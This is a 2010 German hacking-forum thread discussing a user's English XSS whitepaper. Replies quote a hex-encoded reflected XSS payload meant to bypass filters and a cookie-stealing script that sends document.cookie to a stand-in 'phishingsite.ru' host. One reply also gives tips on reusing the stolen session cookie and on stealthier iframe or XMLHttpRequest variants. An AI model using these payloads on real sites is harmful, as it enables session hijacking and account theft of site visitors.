Ergebnis 1 bis 7 von 7
  1. #1
    just call me n0va ^.^ Avatar von novaca!ne
    Registriert seit
    03.01.2009
    Beiträge
    979

    Standard Advanced XSS Knowledge

    Sup,
    Ich möchte hie mal mein Whitepaper präsentieren.

    Man kann es auch hier nachlesen:
    http://www.exploit-db.com/papers/11860

    Ich würde gerne Feedback hören

    Mfg, n0va
    .:B:.
    hilfe in jeglichen bereichen [ausser RAT support >.<]
    Zitat Zitat von Starflow Beitrag anzeigen
    Google kan man nicht nur als Startseite benutzen....

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Barny (07.04.2010), blackberry (07.04.2010), BlackCobra (09.04.2010), c1ox (07.04.2010), J0hn.X3r (07.04.2010), robbys22 (07.04.2010)

  3. #2
    W32.FunLove
    Registriert seit
    21.02.2010
    Beiträge
    156

    Standard

    Sehr gutes Tut, obwohl es auf Englisch ist, hab ichs sogar verstanden wie es geht

  4. #3
    print&lt;&gt;=~y/0-9//,$/ Avatar von 0x30
    Registriert seit
    01.02.2010
    Beiträge
    468

    Standard

    Da diese Tutorial in Englisch verfasst wurde, wird es hier wohl nicht sehr Feedback bekommen.
    Eigentlich gibt es schon genügen Tutorials über das Ganze aber dennoch schon zusammen gefasst auch wenn nichts neues dabei ist.

    $ 2.) HEX encoding is a useful bypass method, too. Using this step will encode
    $ your script, so you can't see what the code will cause.
    $ This is how

    <script>alert(/turtles/);</script>

    $ looks like encrypted in HEX:

    www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%6 5%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F% 73%63%72%69%70%74%3E

    $ (note: i used "/turtles/" (without quote sign) because just "turtles" didn't work).
    Um es gleich richtig zu machen alert(/turtles/.source); damit man auch wirklich nur turtles in der Alertbox stehen hat.

  5. #4
    bit creepy!? Avatar von trisn
    Registriert seit
    01.01.2009
    Beiträge
    894

    Standard

    Hab ich nur so das gefühl oder is jedes Tutorial gleich ?
    Also vom sinn her , ich habe schon ein paar Varianten von XSS hier gepostet gehabt , da die Leute aber keine "große erfolgschance" dabei sehen oder einfach nur zu faul sind um mit etwas JavaScript zu arbeiten wirst du kaum ein wirklich großes Feedback bekommen
    __ __
    \/----\/
    \0 0/
    _\ /_
    _| \/ |_
    | | | | | |
    _| | | | | |_
    "---|_|--|_|---"


    määäähh.

  6. #5
    Gesperrt
    Registriert seit
    19.12.2008
    Beiträge
    1.535

    Standard

    Warum sollte jeder der das nützlich findet dann Feedback schreiben? (:
    Ich drück den THX-Button und das wars.

  7. #6
    print&lt;&gt;=~y/0-9//,$/ Avatar von 0x30
    Registriert seit
    01.02.2010
    Beiträge
    468

    Standard

    Weil man in der Regel gerne wissen möchte, was man noch verbessern kann oder was gut war.
    Ohne Feedbacks und konstruktive Kritik, kann man sich nicht verbessern.

  8. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    J0hn.X3r (07.04.2010)

  9. #7
    Fortgeschrittener Avatar von The-God-of-all
    Registriert seit
    02.09.2007
    Beiträge
    46

    Standard

    Zitat Zitat von novaca!ne Beitrag anzeigen
    $ Inject the following code in your target website:

    http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

    $ Then the victim's cookie (target's website user who visited the url above) should
    $ appear in the log.txt.
    $ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
    $ and use it.

    Das ist aber etwas auffällig wenn die Person auf einmal auf eine andere Webseite weitergeleitet wird? Ich würde in dem Fall eher ein kleines iframe oder so etwas benutzen. Vielleicht kriegt man es auch mit einem XMLHttpRequest hin die Daten an eine andere Seite zu senden. Das wäre noch unauffälliger, sollte aber von den Browsern verhindert werden.

    Ansonsten muss ich mich meinen Vorrednern anschließen, im Grunde stand da nur das drinnen was ich ohnehin schon wusste. Womit ich nichts anfangen kann ist "DOM based XSS". Wenn du darüber nochwas schreiben könntest würdest du mir zumindest was neues erzählen. Das würde mich wirklich interessieren, vor allem weil ich jetzt auch nicht weiß was ich als Website Coder dagegen tun kann. Die anderen beiden sind ein alter Hut und werden auf meinen Seiten sicher nicht funktionieren.

    Zu dem Thema, dass das Tutorial auf Englisch ist: Heutzutage gibt es so viele Informationen auf Englisch. Das braucht man inzwischen fast überall. Und die meisten lernen das auch in der Schule, also sollte eigentlich fast jeder genug Englisch können um das zu lesen. Mir ist es inzwischen eh egal ob die Infos zu einem Thema auf Englisch oder Deutsch sind, ich kann beides gut genug lesen. Es gibt ohnehin unzählige Informationen die man auf Deutsch nicht bekommt bzw. nur in schlechter Qualität (Da fallen mir spontan die ganzen Automatisch übersetzten Seiten von MSDN ein - bevor man die Liest kann man die auch geradee ordentlich auf Englisch lesen).
    "Zwei Dinge sind unendlich: Das Universum und die menschliche Dummheit. Aber beim Universum bin ich mir nicht ganz sicher."
    Albert Einstein

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •